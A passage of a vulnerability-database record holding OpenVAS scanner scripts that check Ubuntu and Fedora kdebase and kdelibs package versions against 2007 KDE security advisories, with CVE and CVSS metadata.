\"CVE-2007-4224\", \"CVE-2007-4225\");\n script_name( \"Ubuntu Update for kdebase, kdelibs vulnerabilities USN-502-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU7.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"kappfinder\", ver:\"3.5.6-0ubuntu20.2\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kate\", ver:\"3.5.6-0ubuntu20.2\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kcontrol\", ver:\"3.5.6-0ubuntu20.2\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kdebase-bin\", ver:\"3.5.6-0ubuntu20.2\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kdebase-dbg\", ver:\"3.5.6-0ubuntu20.2\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kdebase-dev\", ver:\"3.5.6-0ubuntu20.2\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kdebase-kio-plugins\", ver:\"3.5.6-0ubuntu20.2\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kdelibs-dbg\", ver:\"3.5.6-0ubuntu14.1\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kdelibs4-dev\", ver:\"3.5.6-0ubuntu14.1\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kdelibs4c2a\", ver:\"3.5.6-0ubuntu14.1\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kdepasswd\", ver:\"3.5.6-0ubuntu20.2\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kdeprint\", ver:\"3.5.6-0ubuntu20.2\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kdesktop\", ver:\"3.5.6-0ubuntu20.2\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kdm\", ver:\"3.5.6-0ubuntu20.2\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kfind\", ver:\"3.5.6-0ubuntu20.2\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"khelpcenter\", ver:\"3.5.6-0ubuntu20.2\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kicker\", ver:\"3.5.6-0ubuntu20.2\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"klipper\", ver:\"3.5.6-0ubuntu20.2\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kmenuedit\", ver:\"3.5.6-0ubuntu20.2\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"konqueror-nsplugins\", ver:\"3.5.6-0ubuntu20.2\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"konqueror\", ver:\"3.5.6-0ubuntu20.2\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"konsole\", ver:\"3.5.6-0ubuntu20.2\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kpager\", ver:\"3.5.6-0ubuntu20.2\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kpersonalizer\", ver:\"3.5.6-0ubuntu20.2\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ksmserver\", ver:\"3.5.6-0ubuntu20.2\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ksplash\", ver:\"3.5.6-0ubuntu20.2\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ksysguard\", ver:\"3.5.6-0ubuntu20.2\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ksysguardd\", ver:\"3.5.6-0ubuntu20.2\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ktip\", ver:\"3.5.6-0ubuntu20.2\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kwin\", ver:\"3.5.6-0ubuntu20.2\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libkonq4-dev\", ver:\"3.5.6-0ubuntu20.2\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libkonq4\", ver:\"3.5.6-0ubuntu20.2\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kdebase-data\", ver:\"3.5.6-0ubuntu20.2\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kdebase-doc-html\", ver:\"3.5.6-0ubuntu20.2\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kdebase-doc\", ver:\"3.5.6-0ubuntu20.2\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kdebase\", ver:\"3.5.6-0ubuntu20.2\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kdelibs-data\", ver:\"3.5.6-0ubuntu14.1\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kdelibs4-doc\", ver:\"3.5.6-0ubuntu14.1\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kdelibs\", ver:\"3.5.6-0ubuntu14.1\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU6.06 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"kappfinder\", ver:\"3.5.2-0ubuntu27.1\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kate\", ver:\"3.5.2-0ubuntu27.1\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kcontrol\", ver:\"3.5.2-0ubuntu27.1\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kdebase-bin\", ver:\"3.5.2-0ubuntu27.1\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kdebase-dev\", ver:\"3.5.2-0ubuntu27.1\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kdebase-kio-plugins\", ver:\"3.5.2-0ubuntu27.1\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kdelibs-bin\", ver:\"3.5.2-0ubuntu18.5\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kdelibs-dbg\", ver:\"3.5.2-0ubuntu18.5\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kdelibs4-dev\", ver:\"3.5.2-0ubuntu18.5\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kdelibs4c2a\", ver:\"3.5.2-0ubuntu18.5\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kdepasswd\", ver:\"3.5.2-0ubuntu27.1\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kdeprint\", ver:\"3.5.2-0ubuntu27.1\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kdesktop\", ver:\"3.5.2-0ubuntu27.1\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kdm\", ver:\"3.5.2-0ubuntu27.1\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kfind\", ver:\"3.5.2-0ubuntu27.1\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"khelpcenter\", ver:\"3.5.2-0ubuntu27.1\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kicker\", ver:\"3.5.2-0ubuntu27.1\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"klipper\", ver:\"3.5.2-0ubuntu27.1\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kmenuedit\", ver:\"3.5.2-0ubuntu27.1\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"konqueror-nsplugins\", ver:\"3.5.2-0ubuntu27.1\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"konqueror\", ver:\"3.5.2-0ubuntu27.1\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"konsole\", ver:\"3.5.2-0ubuntu27.1\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kpager\", ver:\"3.5.2-0ubuntu27.1\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kpersonalizer\", ver:\"3.5.2-0ubuntu27.1\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ksmserver\", ver:\"3.5.2-0ubuntu27.1\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ksplash\", ver:\"3.5.2-0ubuntu27.1\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ksysguard\", ver:\"3.5.2-0ubuntu27.1\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ksysguardd\", ver:\"3.5.2-0ubuntu27.1\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ktip\", ver:\"3.5.2-0ubuntu27.1\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kwin\", ver:\"3.5.2-0ubuntu27.1\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libkonq4-dev\", ver:\"3.5.2-0ubuntu27.1\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libkonq4\", ver:\"3.5.2-0ubuntu27.1\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kdebase-data\", ver:\"3.5.2-0ubuntu27.1\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kdebase-doc-html\", ver:\"3.5.2-0ubuntu27.1\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kdebase-doc\", ver:\"3.5.2-0ubuntu27.1\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kdebase\", ver:\"3.5.2-0ubuntu27.1\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kdelibs-data\", ver:\"3.5.2-0ubuntu18.5\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kdelibs4-doc\", ver:\"3.5.2-0ubuntu18.5\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kdelibs\", ver:\"3.5.2-0ubuntu18.5\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU6.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"kappfinder\", ver:\"3.5.5-0ubuntu3.5\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kate\", ver:\"3.5.5-0ubuntu3.5\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kcontrol\", ver:\"3.5.5-0ubuntu3.5\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kdebase-bin\", ver:\"3.5.5-0ubuntu3.5\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kdebase-dbg\", ver:\"3.5.5-0ubuntu3.5\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kdebase-dev\", ver:\"3.5.5-0ubuntu3.5\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kdebase-kio-plugins\", ver:\"3.5.5-0ubuntu3.5\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kdelibs-dbg\", ver:\"3.5.5-0ubuntu3.5\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kdelibs4-dev\", ver:\"3.5.5-0ubuntu3.5\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kdelibs4c2a\", ver:\"3.5.5-0ubuntu3.5\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kdepasswd\", ver:\"3.5.5-0ubuntu3.5\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kdeprint\", ver:\"3.5.5-0ubuntu3.5\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kdesktop\", ver:\"3.5.5-0ubuntu3.5\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kdm\", ver:\"3.5.5-0ubuntu3.5\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kfind\", ver:\"3.5.5-0ubuntu3.5\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"khelpcenter\", ver:\"3.5.5-0ubuntu3.5\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kicker\", ver:\"3.5.5-0ubuntu3.5\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"klipper\", ver:\"3.5.5-0ubuntu3.5\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kmenuedit\", ver:\"3.5.5-0ubuntu3.5\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"konqueror-nsplugins\", ver:\"3.5.5-0ubuntu3.5\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"konqueror\", ver:\"3.5.5-0ubuntu3.5\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"konsole\", ver:\"3.5.5-0ubuntu3.5\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kpager\", ver:\"3.5.5-0ubuntu3.5\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kpersonalizer\", ver:\"3.5.5-0ubuntu3.5\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ksmserver\", ver:\"3.5.5-0ubuntu3.5\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ksplash\", ver:\"3.5.5-0ubuntu3.5\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ksysguard\", ver:\"3.5.5-0ubuntu3.5\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ksysguardd\", ver:\"3.5.5-0ubuntu3.5\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ktip\", ver:\"3.5.5-0ubuntu3.5\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kwin\", ver:\"3.5.5-0ubuntu3.5\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libkonq4-dev\", ver:\"3.5.5-0ubuntu3.5\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libkonq4\", ver:\"3.5.5-0ubuntu3.5\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kdebase-data\", ver:\"3.5.5-0ubuntu3.5\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kdebase-doc-html\", ver:\"3.5.5-0ubuntu3.5\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kdebase-doc\", ver:\"3.5.5-0ubuntu3.5\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kdebase\", ver:\"3.5.5-0ubuntu3.5\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kdelibs-data\", ver:\"3.5.5-0ubuntu3.5\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kdelibs4-doc\", ver:\"3.5.5-0ubuntu3.5\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kdelibs\", ver:\"3.5.5-0ubuntu3.5\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-25T10:56:25", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-4224", "CVE-2007-4225", "CVE-2007-3820"], "description": "Check for the Version of kdebase", "modified": "2017-07-10T00:00:00", "published": "2009-02-27T00:00:00", "id": "OPENVAS:861524", "href": "http://plugins.openvas.org/nasl.php?oid=861524", "type": "openvas", "title": "Fedora Update for kdebase FEDORA-2007-1700", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kdebase FEDORA-2007-1700\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"kdebase on Fedora 7\";\ntag_insight = \"Core applications for the K Desktop Environment. Included are: kdm\n (replacement for xdm), kwin (window manager), konqueror (filemanager,\n web browser, ftp client, ...), konsole (xterm replacement), kpanel\n (application starter and desktop pager), kaudio (audio server),\n kdehelp (viewer for kde help files, info and man pages), kthememgr\n (system for managing alternate theme packages) plus other KDE\n components (kcheckpass, kikbd, kscreensaver, kcontrol, kfind,\n kfontmanager, kmenuedit).\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/fedora-package-announce/2007-August/msg00317.html\");\n script_id(861524);\n script_version(\"$Revision: 6623 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:10:20 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 15:48:41 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"FEDORA\", value: \"2007-1700\");\n script_cve_id(\"CVE-2007-3820\", \"CVE-2007-4224\", \"CVE-2007-4225\");\n script_name( \"Fedora Update for kdebase FEDORA-2007-1700\");\n\n script_summary(\"Check for the Version of kdebase\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC7\")\n{\n\n if ((res = isrpmvuln(pkg:\"kdebase\", rpm:\"kdebase~3.5.7~13.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kdebase\", rpm:\"kdebase~3.5.7~13.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kdebase-debuginfo\", rpm:\"kdebase-debuginfo~3.5.7~13.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kdebase-extras\", rpm:\"kdebase-extras~3.5.7~13.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kdebase-devel\", rpm:\"kdebase-devel~3.5.7~13.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kdebase-debuginfo\", rpm:\"kdebase-debuginfo~3.5.7~13.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kdebase\", rpm:\"kdebase~3.5.7~13.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kdebase-extras\", rpm:\"kdebase-extras~3.5.7~13.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kdebase-devel\", rpm:\"kdebase-devel~3.5.7~13.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) 